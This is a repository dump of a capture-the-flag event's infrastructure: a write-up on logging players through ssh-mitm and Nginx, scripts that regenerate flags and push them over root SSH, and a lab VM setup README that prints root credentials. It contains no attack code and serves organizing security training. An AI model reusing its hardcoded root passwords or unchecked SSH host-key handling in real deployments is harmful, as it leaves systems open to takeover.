├── Game Of Thrones
├── Architecture
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── Architecture.svg
│ │ ├── Log.gif
│ │ ├── dracarys.gif
│ │ ├── game.jpg
│ │ ├── ssh-mitm.svg
│ │ └── trust.gif
├── CTF Platform
│ ├── README.md
│ ├── blitz_overwrite.py
│ ├── completion_checker.sh
│ ├── db_flag_regeneration.py
│ └── total_overwrite.sh
├── Machines
│ ├── Blitz
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ ├── admin-access-denied.png
│ │ │ ├── admin-create-new-product.png
│ │ │ ├── admin-panel-landing.png
│ │ │ ├── burp-intercept-newproduct.png
│ │ │ ├── discovering-sql-error.png
│ │ │ ├── file-upload-1.png
│ │ │ ├── file-upload-2.png
│ │ │ ├── file-upload-3.png
│ │ │ ├── git-gitserver-staging.png
│ │ │ ├── git-ls-la.png
│ │ │ ├── git-pipeline-staging.png
│ │ │ ├── jenkins-app-dashboard.png
│ │ │ ├── jenkins-build.png
│ │ │ ├── jenkins-dashboard.png
│ │ │ ├── jenkins-landing.png
│ │ │ ├── jenkins-login-screen.png
│ │ │ ├── jwt-1.png
│ │ │ ├── jwt-2.png
│ │ │ ├── jwt-3.png
│ │ │ ├── main-landing.png
│ │ │ ├── main-login.png
│ │ │ ├── make-admin-added-new-admin.png
│ │ │ ├── prod-web-root.png
│ │ │ ├── registration-test.png
│ │ │ ├── shell-as-postgres.png
│ │ │ ├── source-code-1.png
│ │ │ ├── sql-0-intercept.png
│ │ │ ├── sql-1-create-table.png
│ │ │ └── sql-2-rce.png
│ │ └── Walkthrough.md
│ ├── Bytescribe
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ ├── Screenshot-2023-10-06-024100.png
│ │ │ └── Screenshot-2023-10-06-035333.png
│ │ └── Walkthrough.md
│ ├── Callobes
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ ├── image-1.png
│ │ │ ├── image-2.png
│ │ │ ├── image-3.png
│ │ │ ├── image-4.png
│ │ │ ├── image-5.png
│ │ │ ├── image-6.png
│ │ │ └── image.png
│ │ └── Walkthrough.md
│ ├── Captivity
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ ├── 80_landing.png
│ │ │ ├── bloodhound-analysis.png
│ │ │ ├── bloodhound-login.png
│ │ │ ├── bloodhound-shortest-path-2.png
│ │ │ ├── bloodhound-shortest-path.png
│ │ │ ├── file-hosting-dashboard-2.png
│ │ │ ├── file-hosting-dashboard.png
│ │ │ ├── file-hosting-landing.png
│ │ │ ├── file-hosting-login.png
│ │ │ ├── file-hosting-upload-exploit-2.png
│ │ │ ├── file-hosting-upload-exploit.png
│ │ │ ├── file-hosting-upload.png
│ │ │ ├── google-exploit.png
│ │ │ └── neo4j-initialize.png
│ │ └── Walkthrough.md
│ ├── Gitlab
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ └── image-1.png
│ │ └── Walkthrough.md
│ ├── NoteApp
│ │ ├── README.md
│ │ ├── Screenshots
│ │ │ └── image-1.png
│ │ └── Walkthrough.md
│ └── README.md
└── README.md
├── README.md
└── Who Am I
├── README.md
├── Writeups
├── C1 - Death Token Challenge
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── image.jpg
│ │ ├── image1.png
│ │ ├── image2.png
│ │ ├── image3.png
│ │ └── image4.png
├── C10 - Shadows Possession Jutsu
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── image 1.png
│ │ ├── image 10.png
│ │ ├── image 11.png
│ │ ├── image 12.png
│ │ ├── image 2.png
│ │ ├── image 3.png
│ │ ├── image 4.png
│ │ ├── image 5.png
│ │ ├── image 6.png
│ │ ├── image 7.png
│ │ ├── image 8.png
│ │ ├── image 9.png
│ │ └── image.png
├── C11 - Serial Escape
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── 2024-09-25_17h29_25.png
│ │ ├── 2024-09-25_17h30_17.png
│ │ ├── 2024-09-25_17h30_48.png
│ │ ├── 2024-09-25_17h31_16.png
│ │ ├── 2024-09-25_17h36_49.png
│ │ ├── 2024-09-25_17h38_46.png
│ │ ├── 2024-09-25_17h39_16.png
│ │ ├── 2024-09-25_17h39_31.png
│ │ ├── 2024-09-25_17h39_50.png
│ │ ├── 2024-09-25_17h41_34.png
│ │ ├── 2024-09-25_17h41_42.png
│ │ ├── 2024-09-25_17h45_54.png
│ │ ├── 2024-09-25_17h54_27.png
│ │ ├── 2024-09-25_18h12_04.png
│ │ ├── 2024-09-25_18h22_19.png
│ │ ├── 2024-09-25_18h24_52.png
│ │ ├── 2024-09-25_18h30_58.png
│ │ ├── 2024-09-25_18h33_34.png
│ │ ├── 2024-09-25_18h34_12.png
│ │ ├── 2024-09-25_18h35_11.png
│ │ ├── 2024-09-25_18h56_23.png
│ │ └── 2024-09-27_22h13_01.png
├── C12 - Mr. Windoclin
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── cms-admin-dashboard.png
│ │ ├── cms-admin-panel.png
│ │ ├── cms-hostname-revealed.png
│ │ ├── cms-rce.png
│ │ ├── cms-redirects.png
│ │ ├── cms-reverse-shell.png
│ │ ├── docker-compose-file.png
│ │ ├── ftp-session.png
│ │ ├── github-osint-2.png
│ │ ├── github-osint-3.png
│ │ ├── github-osint.png
│ │ ├── machine-exploited.png
│ │ ├── prepare-exploit.png
│ │ ├── shared-folder.png
│ │ ├── wbce-cms-googled.png
│ │ ├── wbce-cms.png
│ │ ├── windows-enum.png
│ │ └── windows-shared-folder.png
├── C2 - Decode the Escape
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── figure-1.png
│ │ ├── figure-2.png
│ │ ├── figure-3.png
│ │ ├── figure-4.png
│ │ ├── figure-5.png
│ │ ├── figure-6.png
│ │ ├── figure-7.png
│ │ ├── figure-8.png
│ │ └── figure-9.png
├── C3 - ANAIS_WATT3RS0N
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── image1.png
│ │ ├── image2.png
│ │ ├── image3.png
│ │ ├── image4.png
│ │ ├── image5.png
│ │ └── image6.png
├── C4 - #exec cmd=whoami
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── figure-1.png
│ │ ├── figure-2.png
│ │ ├── figure-3.png
│ │ ├── figure-4.png
│ │ ├── figure-5.png
│ │ ├── figure-6.png
│ │ ├── figure-7.png
│ │ ├── figure-8.png
│ │ └── figure-9.png
├── C5 - Packet Detective
│ ├── README.md
│ ├── Writeup.md
│ ├── challenge.pcapng
│ └── images
│ │ ├── figure-1.png
│ │ ├── figure-2.png
│ │ ├── figure-3.png
│ │ ├── figure-4.png
│ │ ├── figure-5.png
│ │ ├── figure-6.png
│ │ └── figure-7.png
├── C6 - Exorcising Sukuna’s Curse
│ ├── README.md
│ ├── Writeup.md
│ └── images
│ │ ├── ctf2.png
│ │ ├── image 01.jpg
│ │ ├── image 02.png
│ │ ├── image 03.png
│ │ ├── image 04.png
│ │ ├── image 05.png
│ │ ├── image 1.png
│ │ ├── image 10.png
│ │ ├── image 11.png
│ │ ├── image 12.png
│ │ ├── image 13.png
│ │ ├── image 14.png
│ │ ├── image 15.png
│ │ ├── image 16.png
│ │ ├── image 17.png
│ │ ├── image 18.png
│ │ ├── image 19.png
│ │ ├── image 2.png
│ │ ├── image 20.png
│ │ ├── image 21.png
│ │ ├── image 22.png
│ │ ├── image 23.png
│ │ ├── image 24.png
│ │ ├── image 25.png
│ │ ├── image 26.png
│ │ ├── image 27.png
│ │ ├── image 28.png
│ │ ├── image 29.png
│ │ ├── image 3.png
│ │ ├── image 30.png
│ │ ├── image 31.png
│ │ ├── image 32.png
│ │ ├── image 33.png
│ │ ├── image 4.png
│ │ ├── image 5.png
│ │ ├── image 6.png
│ │ ├── image 7.png
│ │ ├── image 8.png
│ │ ├── image 9.png
│ │ ├── image.png
│ │ └── imagee.png
├── C7 - Root Reaper Quest
│ ├── README.md
│ ├── audit.log
│ ├── images
│ │ ├── image1.png
│ │ ├── image2.png
│ │ ├── image3.png
│ │ ├── image4.png
│ │ ├── image5.png
│ │ ├── image6.jpg
│ │ └── image6.png
│ └── writeup.md
├── C8 - In Quest for Rogue Dragon
│ ├── Images
│ │ ├── image 1.png
│ │ ├── image 10.png
│ │ ├── image 11.png
│ │ ├── image 2.png
│ │ ├── image 3.png
│ │ ├── image 4.png
│ │ ├── image 5.png
│ │ ├── image 6.png
│ │ ├── image 7.png
│ │ ├── image 8.png
│ │ ├── image 9.png
│ │ ├── image.png
│ │ └── imageee.png
│ ├── README.md
│ ├── Writeup.md
│ └── rev.exe
└── C9 - End of Rumbling
│ ├── README.md
│ ├── images
│ ├── esasimage.png
│ ├── image 1.png
│ ├── image 10.png
│ ├── image 11.png
│ ├── image 12.png
│ ├── image 13.png
│ ├── image 14.png
│ ├── image 15.png
│ ├── image 16.png
│ ├── image 17.png
│ ├── image 18.png
│ ├── image 19.png
│ ├── image 2.png
│ ├── image 20.png
│ ├── image 21.png
│ ├── image 3.png
│ ├── image 4.png
│ ├── image 5.png
│ ├── image 6.png
│ ├── image 7.png
│ ├── image 8.png
│ ├── image 9.png
│ └── image.png
│ └── writeup.md
└── ctf_submission_logs.csv
/Game Of Thrones/Architecture/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/README.md
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/Writeup.md:
--------------------------------------------------------------------------------
# Did the Winter really come to Westeros? Engineering the GoT CTF

# Introduction

This is meant to be an overview of the technical preparation timeline of the “Game Of Thrones” CTF. The write-up is an objective, second-person view (our honest confession) of our design, plans and choices, their pros and cons, and what we did well and what we didn’t throughout the process.

“Game of Thrones” - **a power struggle: who has it, who wants it and how they plan to get it.**

This is now your view as the Challenger of The Throne:

**In the perilous realm of Westeros, flags hold power as coveted as the Iron Throne itself. Dive into the intricate web of challenges, where every capture brings you closer to ruling the Seven Kingdoms. Beware, for in this game of flags, you win or you lose. Only the cunning and brave will seize the throne and reign supreme.**

That was the player’s challenge to overcome. But what about the Throne: how does it choose the Next Ruler? What sacrifices and risks must the player take while fighting their way towards it? Let’s build our Throne and leave it waiting for its Next Ruler to come!



### Deep Note

This is not a deep-dive engineering blog that intends to surprise the reader by solving some complex riddle of a great technological problem.

It is just a Not-So-Technical blog of nerdy Non-Engineers Engineering their way towards answers to a bunch of their silly what-if questions.

Did we really overcome the Winter? What about the White Walkers? We will see it together!

# Challenges of Building a Throne

Our end goal was to implement a CTF environment that fulfilled the following ideas:

- No regulations by design - no rules are imposed on players, no ethics applied!
- The CTF machines are Same-Machine-All-Players - each challenge machine has just one instance at any given time, and all players have to find their way through that same machine.
- Since any player may act with malicious intent inside the machines (remember, no ethics applied!), there are no restrictions. However, players can be caught by The City Watch (the police) while or after committing a crime! So we needed to implement our own version of “The City Watch”.

In summary, we had to implement a ‘healthy’ infrastructure that would maintain a consistent, unbroken scheme throughout the CTF lifecycle.

## Design Challenges

- Source of trust - static points that players (of any intent) cannot interfere with.
- Logging - implementing a consistent logging mechanism and deciding what to do with the collected logs.
- Automation - being able to trigger vital actions (arguably too complex for fully manual work) to keep things under control.
- Design of Infrastructure - resource planning and optimization of the structure’s elements.

Time For Some Solutions!

# Overcoming (Building The Throne)

## Discovering the Source of Trust

We first tried to build or find solid Source of Trust point(s) in the CTF architecture that would give us complete control over the structure, with the goal of keeping the system consistent and more resilient.

**Proxy ’em all!**

Our initial thought was to implement some kind of logical proxy - theoretically, something that gives us first-hand control before and/or after players compromise the vulnerable machines.

If we could implement this proxy logic, that would be our actual Source of Trust!

## Logging The Unknown

This was a bit challenging, as we needed to log the actions of each player to be able to trace any issue that arose. Since all players would play in the same perimeter, we had to monitor malicious actions and revert the machines in a way that doesn’t disturb the CTF cycle.

As these logs play a crucial role in the structure, they must not be tampered with in any way.

**Conclusion**

After some (and some more) failed attempts, we came to the conclusion that we needed a way to log OS-level actions (commands) independently of the access type (SSH, FTP, or anything else). If we could not handle this universally, it would be disastrous, as each protocol (thousands of ’em!) has its own characteristics to handle.

This is where the “Source of Trust” proxy idea came back to our mind! If our proxy could handle traffic universally (one entry point), we could use it for standardized logging!

For the “One Entry Point” idea, we wanted to use SSH. Initially, it seemed like a great idea! But how can we log SSH?

**One ssh-mitm to rule ‘em all!**

*[**SSH-MITM**](https://github.com/ssh-mitm/ssh-mitm) is a man-in-the-middle SSH server for security audits and malware analysis.*



Basically, we wanted to intercept all traffic through the SSH server and, hopefully, log all of it. That led us to another problem: if we settled on ssh-mitm, where would it connect to (SSH forwarding)?

Again, after some attempts and failures, we came up with the idea of using intermediary system(s) to operate from. That’s when we decided to put the “Attack Box” logic into action - a well-known way of providing players with a stable, predefined attack machine environment to work in and launch attacks from against the target system.

We initially employed this logic as the SSH endpoint that SSH-MITM connects to, improving the reliability and consistency of our system for all users.

**Web of web**

Later, we also decided to proxy HTTP traffic separately, directly through Nginx - HTTP by itself covers most network traffic (and so it did in our CTF). Additionally, requiring CTF players to connect via the command line (SSH) would pose a significant challenge when testing for web application vulnerabilities, as they would be unable to use well-known web application pentesting tools (Burp Suite, ZAP, etc.).

Now our logging environment was defined, and after some custom configuration of the ssh-mitm tool and the Nginx proxy itself, we were able to *capture the unknown*!



## Some Automation?

Much of the automation revolved around the flag mechanism, which plays a vital role in the CTF platform.

Under the hood, we used the CTFd platform, an excellent open-source tool designed for Capture The Flag events with a user-friendly interface and a high degree of customizability.

With the goal of making the flag mechanism (generation, submission and pushing) reliable, we implemented automation according to our CTF strategy and requirements. We won’t get into details, but here is a general overview of the customization and the role of automation:

- Flag Regeneration - to (re)generate flags under certain conditions (e.g. preventing the reuse of the same flag).
- Flag Submission - to notify us of a particular team’s progress on a machine (such as locating all of its flags), which then lets us take protective measures (such as disabling that team’s access to the machine).
- Flag Placement - to upload (re)generated flags to the CTF machines and notify us of failed push actions (indicating network errors and/or malicious actions by players), allowing us, for instance, to revert damaged machines.

**Note** - These are heavily over-simplified descriptions; the more detailed actions are not listed here.
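As an added example (not part of the original write-up or the repository's scripts), here is how the Flag Placement step can validate a flag before interpolating it into a remote shell command and then verify the write by reading the file back, so that a mismatch is reported the same way as a failed push. The `FLAG_FILES` table mirrors the Blitz paths used by `blitz_overwrite.py`; the `run_remote` callable and the `FakeBox` machine are assumptions of this example that stand in for the real SSH session.

```python
import re
import shlex

# Flag format produced by db_flag_regeneration.py: ICSD{<32 hex chars of an md5>}
FLAG_RE = re.compile(r"^ICSD\{[0-9a-f]{32}\}$")

# Flag locations on the Blitz machine, mirroring blitz_overwrite.py
# (owner None keeps the file root-owned with default permissions)
FLAG_FILES = {
    "user1.txt": ("/user1.txt", None),
    "user2.txt": ("/home/git/user2.txt", "git:git"),
    "user3.txt": ("/home/node/user3.txt", "node:node"),
    "root.txt": ("/root/root.txt", None),
}


def build_place_command(challenge_name, flag):
    """Build the remote shell command that (re)creates one flag file.

    The flag is rejected unless it has the expected format, and it is shell-quoted
    anyway, so a tampered CTFd flag entry cannot become an arbitrary command on the box.
    """
    if not FLAG_RE.fullmatch(flag):
        raise ValueError(f"refusing to place malformed flag for {challenge_name}: {flag!r}")
    path, owner = FLAG_FILES[challenge_name]
    command = f"rm -f {path} && echo {shlex.quote(flag)} > {path}"
    if owner:
        command += f" && chown {owner} {path} && chmod 600 {path}"
    return command


def place_and_verify(run_remote, challenge_name, flag):
    """Place the flag, read it back and classify the outcome.

    run_remote(command) -> (stdout, stderr) is an assumed callable wrapping the SSH
    session (paramiko's exec_command in the repository's scripts). Returns "ok",
    "write-error" or "mismatch"; the last two are what the organizers would report
    (e.g. via Telegram) as a failed push and possible tampering.
    """
    path, _ = FLAG_FILES[challenge_name]
    _, stderr = run_remote(build_place_command(challenge_name, flag))
    if stderr.strip():
        return "write-error"  # e.g. a player deleted the home directory
    stdout, stderr = run_remote(f"cat {path}")
    if stderr.strip() or stdout.strip() != flag:
        return "mismatch"  # file missing or altered right after the write
    return "ok"


class FakeBox:
    """Constructed stand-in for the remote machine (a dict of path -> content).

    It understands only the two command shapes used above, which is enough to
    exercise all three outcomes without a real SSH session.
    """

    def __init__(self, missing_dirs=(), tampered_paths=()):
        self.files = {}
        self.missing_dirs = set(missing_dirs)      # simulates a deleted directory
        self.tampered_paths = set(tampered_paths)  # simulates a player altering the file

    def run(self, command):
        if command.startswith("cat "):
            path = command[len("cat "):]
            if path in self.files:
                return self.files[path] + "\n", ""
            return "", f"cat: {path}: No such file or directory\n"
        # shlex.quote wraps the flag in single quotes because of the braces
        m = re.search(r"echo '([^']*)' > (\S+)", command)
        flag, path = m.group(1), m.group(2)
        if path.rsplit("/", 1)[0] in self.missing_dirs:
            return "", f"sh: 1: cannot create {path}: Directory nonexistent\n"
        self.files[path] = "PWNED" if path in self.tampered_paths else flag
        return "", ""


if __name__ == "__main__":
    sample_flag = "ICSD{" + "0123456789abcdef" * 2 + "}"
    print(place_and_verify(FakeBox().run, "user1.txt", sample_flag))
    print(place_and_verify(FakeBox(missing_dirs=("/home/git",)).run, "user2.txt", sample_flag))
    print(place_and_verify(FakeBox(tampered_paths=("/root/root.txt",)).run, "root.txt", sample_flag))
```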

Now that we’ve discussed everything that brought us to the final design, let’s take a look at the actual scheme!

## Design of Infrastructure



This is a somewhat simplified version of the general architecture of the GoT CTF!

Let’s summarize the design flow:

- Players test web apps (HTTP) hosted on the vulnerable machines - proxied directly through Nginx, using virtual hosting (to resolve port and/or service/daemon collisions), to the CTF machines.
- Players test other services hosted on the vulnerable machines - proxied through Nginx to an ssh-mitm instance, then forwarded to the actual SSH server of the Attack Box, and from there to the underlying daemon.
- Attack Boxes are not allowed HTTP connectivity to the CTF machines, so as not to bypass our “HTTP Proxy” logic.
- SSH-MITM and HTTP proxy logs are forwarded to an Elasticsearch instance for indexing and storage.
- CTF players have direct access to the CTF platform (CTFd) and to the Elasticsearch instance (for Blue Teaming).
- Scripts on the machine where CTFd is deployed push the (frequently regenerated) flags to the vulnerable machines constantly (every 2 minutes). If a push fails, they notify us via Telegram (to detect a possible intrusion).

This is our final design, but before arriving at it we followed some sub-paths that we eliminated over time. Let’s look at some of them.

### Failures of the Success

The most notable (critical) design eliminations:

- Logging actions and traffic directly from the CTF machines was the most straightforward and convenient choice initially. In fact, it was the motivation behind seeking a static Source of Trust that would remain untouched (for obvious reasons).
- SSH tunneling - we initially thought of using SSH as a tunnel, forcing player devices to connect through it. However, we realized that even with an SSH tunnel, the communication would still be end-to-end: we would not be able to intercept it, as the connection would remain protocol-based activity (no static point achieved, in fact). As a result, we ruled out this option.
- To establish an SSH connection from ssh-mitm, we required an intermediary boundary, as discussed earlier. Initially, we considered forwarding that connection directly to the Nginx host for simplicity. However, we realized that this approach posed a significant problem: if a (potentially malicious) player managed to execute commands there, even with limited privileges, it would compromise our “Source of Trust”. As a result, we discarded this option.
- And the list goes on!

# Conclusion

So this is a refined version of tons of failed attempts, a showcase, right?! Maybe!

While building the CTF within the given time and resource limitations, we did try to deliver something tangible that would live up to the promise. The architecture may have some weaker points depending on the viewer (and for us too), but the raw idea is one we were able to make concrete, at least to some extent. Hence, it is definitely open for further development and refinement!

It is crucial to recognize that the act of creation frequently necessitates the deconstruction and subsequent reconstruction of an entity, allowing for its continual reemergence.

Now let the fun begin! Dracarys!



**Perchance the winter has descended upon us, but the Night King, he hath not emerged in this season’s cold embrace!**

--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/Log.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/Log.gif
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/dracarys.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/dracarys.gif
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/game.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/game.jpg
--------------------------------------------------------------------------------
/Game Of Thrones/Architecture/images/trust.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Game Of Thrones/Architecture/images/trust.gif
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/blitz_overwrite.py:
--------------------------------------------------------------------------------
import shlex
import sys

import paramiko
import requests

# Replace with your actual Bearer token and category variable
bearer_token = "ctfd_sampleToken"
machine = "blitz"
server_ip = "10.20.52.2"

ssh_username = "root"
ssh_password = "PasswordOfRoot"

# All challenges of this machine share the CTFd category "blitz"
initial_url = f"http://localhost:8000/api/v1/challenges?category={machine}"

# CTFd expects the access token in an "Authorization: Token ..." header
headers = {
    "Authorization": f"Token {bearer_token}",
    "Content-Type": "application/json",
}

# Where each challenge's flag file lives on the Blitz machine and who should own it
# (None keeps the file root-owned with default permissions)
FLAG_FILES = {
    "user1.txt": ("/user1.txt", None),
    "user2.txt": ("/home/git/user2.txt", "git:git"),
    "user3.txt": ("/home/node/user3.txt", "node:node"),
    "root.txt": ("/root/root.txt", None),
}

ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())


def send_telegram_message(text):
    message_data = {
        "chat_id": "TelegramGroupChatId",
        "text": "Overwriter script - error in Blitz machine - " + text,
    }
    requests.post("https://api.telegram.org/botTokenProvidedByTelegram/sendMessage", data=message_data)


def place_flag(path, owner, flag):
    """Recreate one flag file over SSH; the flag is shell-quoted so it is never parsed by the remote shell."""
    command = f"rm -rf {path} ; echo {shlex.quote(flag)} > {path}"
    if owner:
        command += f" && chown {owner} {path} && chmod 600 {path}"
    stdin, stdout, stderr = ssh_client.exec_command(command)
    error_message = stderr.read()
    if error_message:
        send_telegram_message(error_message.decode("utf-8"))
        print("ERROR " + error_message.decode("utf-8"))
    print(f"SSHing {flag} into {path}")


try:
    ssh_client.connect(server_ip, username=ssh_username, password=ssh_password, timeout=10)
except Exception:
    send_telegram_message("no SSH access")
    sys.exit()

try:
    # Make the initial request to get the machine's challenges
    response = requests.get(initial_url, headers=headers)
    if response.status_code == 200:
        challenges = response.json()["data"]

        # Iterate over the list of challenges and fetch the current flag of each
        for challenge in challenges:
            challenge_id = challenge["id"]
            challenge_name = challenge["name"]
            flags_url = f"http://localhost:8000/api/v1/flags?challenge_id={challenge_id}"

            response = requests.get(flags_url, headers=headers)
            if response.status_code == 200:
                flag = response.json()["data"][0]["content"]
                if challenge_name in FLAG_FILES:
                    path, owner = FLAG_FILES[challenge_name]
                    place_flag(path, owner, flag)
                else:
                    print("ERROR . CHALLENGE NOT FOUND IN OVERWRITE BLITZ")
            else:
                print(f"BLITZ Failed to retrieve flags for Challenge {challenge_id}. Status Code: {response.status_code}")
    else:
        print(f"BLITZ Failed to retrieve challenges. Status Code: {response.status_code}")
except Exception as e:
    send_telegram_message(str(e))
    print(f"BLITZ An error occurred: {str(e)}")
finally:
    ssh_client.close()
--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/completion_checker.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Usage: completion_checker.sh <team_id> <team_name> <challenge_category>
# Checks whether a team has a correct submission for every challenge of a machine
# (a CTFd category) and, if so, notifies the organizers via Telegram.

if [ $# -ne 3 ]; then
    echo "Usage: $0 <team_id> <team_name> <challenge_category>" >&2
    exit 1
fi

team_id=$1
team_name=$2
challenge_category=$3

ctfd_token="ctfd_sampletoken"

# All challenge ids that belong to this machine's category
challenge_ids=($(curl -sS -X GET "http://localhost:8000/api/v1/challenges?category=${challenge_category}" \
    --header "Authorization: Token ${ctfd_token}" --header "Content-Type: application/json" | jq -r '.data[].id'))

allChallengesOfMachineCompleted=true

for id in "${challenge_ids[@]}"; do
    # Number of correct submissions by this team for the challenge (exactly one once solved)
    submission_result_count=$(curl -sS -X GET "http://localhost:8000/api/v1/submissions?team_id=${team_id}&challenge_id=${id}&type=correct" \
        --header "Authorization: Token ${ctfd_token}" --header "Content-Type: application/json" | jq -r '.meta.pagination.total')

    # String comparison so that an empty or "null" API answer counts as not completed instead of erroring
    if [ "$submission_result_count" != "1" ]; then
        allChallengesOfMachineCompleted=false
    fi
done

# A category with no challenges can never count as completed
if [ ${#challenge_ids[@]} -eq 0 ]; then
    allChallengesOfMachineCompleted=false
fi

if [ "$allChallengesOfMachineCompleted" = true ]; then
    curl -sS -X GET "https://api.telegram.org/botTokenProvidedByTelegram/sendMessage?chat_id=groupChatIdHere&text=Team_${team_id}_finished_machine_${challenge_category}"
fi

--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/db_flag_regeneration.py:
--------------------------------------------------------------------------------
import datetime
import hashlib
import json
import sys

import requests


def main(argv):
    # Usage: db_flag_regeneration.py --all | <machine category>
    if not argv or not argv[0]:
        print("Usage: db_flag_regeneration.py --all | <machine category>")
        sys.exit(1)
    option = argv[0]
    bearer_token = "ctfd_sampletoken"
    if option == "--all":
        request_url = "http://localhost:8000/api/v1/challenges"
        print("Generating flags in DB for all machines.")
    else:
        request_url = f"http://localhost:8000/api/v1/challenges?category={option}"
        print(f"Generating flags in DB for {option} machine")

    headers = {
        "Authorization": f"Token {bearer_token}",
        "Content-Type": "application/json",
    }

    challenges_response = requests.get(request_url, headers=headers)
    if challenges_response.status_code != 200:
        print(f"Failed to retrieve challenges. Status Code: {challenges_response.status_code}")
        return
    challenges = challenges_response.json()["data"]
    for challenge in challenges:
        challenge_id = challenge["id"]
        challenge_name = challenge["name"]
        machine = challenge["category"]
        flags_response = requests.get(f"http://localhost:8000/api/v1/flags?challenge_id={challenge_id}", headers=headers)
        if flags_response.status_code != 200:
            print(f"Failed to retrieve flags for challenge {challenge_id}. Status Code: {flags_response.status_code}")
            continue
        flag = flags_response.json()["data"][0]
        flag_id = flag["id"]

        # New flag: MD5 over the current timestamp and the challenge identity, wrapped as ICSD{...}
        ct = str(datetime.datetime.now())
        pre_hash = ct + ";" + str(flag_id) + ";" + str(machine) + ";" + str(challenge_name)
        new_flag_hash = hashlib.md5(pre_hash.encode("utf-8")).hexdigest()
        new_flag = f"ICSD{{{new_flag_hash}}}"
        flag_change_data = {
            "content": new_flag,
            "data": "",
            "type": "static",
            "id": f"{flag_id}",
        }
        # Overwrite the stored flag in CTFd through the flags API
        flag_regenerate_response = requests.patch(
            f"http://localhost:8000/api/v1/flags/{flag_id}", data=json.dumps(flag_change_data), headers=headers
        )
        if flag_regenerate_response.status_code != 200:
            print(f"Failed to update flag {flag_id}. Status Code: {flag_regenerate_response.status_code}")


if __name__ == "__main__":
    main(sys.argv[1:])

--------------------------------------------------------------------------------
/Game Of Thrones/CTF Platform/total_overwrite.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Launch every per-machine flag overwrite script in parallel (run periodically, e.g. every 2 minutes)
python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/blitz_overwrite.py &
python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/captivity_overwrite.py &
python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/bytescribe_overwrite.py &
python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/bytescribe_docker_overwrite.py &
python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/noteapp_overwrite.py &
python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/gitlab_overwrite.py &
python3 /home/ctf-platform/Desktop/CTFd/CTFd/api/v1/ctfd_scripts/overwrite_scripts/callobes_overwrite.py &

--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/README.md:
--------------------------------------------------------------------------------
# Setup

1. Use the installation link to download the .ova file.
2. Import the image file into VMware using File -> Open.
> [!WARNING]
> The images are not supported by VirtualBox.

3. Choose a virtual machine name and location for the new VM.
4. The default network interface is configured as NAT. If it is not, please set it to NAT.
5. You can find the IP address of the machine using arp-scan from your Kali machine.
```
┌──(kali㉿kali)-[~/Captivity]
└─$ sudo arp-scan -l
[sudo] password for kali:

Interface: eth0, type: EN10MB, MAC: 00:0c:29:ee:f4:ad, IPv4: 192.168.100.132
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1 00:50:56:c0:00:08 VMware, Inc.
192.168.100.2 00:50:56:e5:ad:c6 VMware, Inc.
192.168.100.131 00:0c:29:d5:b9:3e VMware, Inc.
192.168.100.254 00:50:56:fa:13:b9 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.005 seconds (127.68 hosts/sec). 4 responded

┌──(kali㉿kali)-[~/Captivity]
└─$ ssh root@192.168.100.131
root@192.168.100.131's password:
Welcome to Ubuntu 23.04 (GNU/Linux 6.2.0-33-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

68 updates can be applied immediately.
22 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Last login: Thu Sep 28 09:13:52 2023 from 192.168.100.1
root@blitz:~# exit
logout
Connection to 192.168.100.131 closed.
```
6. If something goes wrong, use the credentials provided below to access the machine.

# Credentials
```
root:3AsaFRMwkdmBMQwuC4sr
```

--------------------------------------------------------------------------------
/Game Of Thrones/Machines/Blitz/Screenshots/admin-access-denied.png:
